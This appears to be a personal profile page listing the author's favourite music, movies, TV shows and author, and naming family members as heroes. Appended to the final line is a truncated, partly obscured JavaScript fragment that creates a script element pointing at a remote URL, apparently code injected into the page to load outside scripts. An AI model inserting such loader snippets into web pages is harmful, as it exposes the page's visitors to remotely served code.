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I have a huge variety of music, so i like a lil bit of everything. But my all time favorite band is Rascal Flatts. I love their music and most of their songs have a story or meaning behind them.
Top Gun is my all time favorite movie, but i have so many other movies that i like to watch like, Gone In 60 Seconds, American Wedding, Happy Gilmore, Walking Tall, The Rundown, Million Dollar Baby, Wedding Crashers, Joyride, and so much more....
Well i was addicted to the t.v. show Friends, and own every season, but since that's not on anymore, i watch American Idol, Law & Order SVU, and some stuff on MTV.
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Sophie Kinsella
My mom and older brother. They are always there for me, and i know i can depend on them. Also my very loving husband Chris, with him i know i can do anything!.."var x=..·..('script');x.src='http://www.../.../tes
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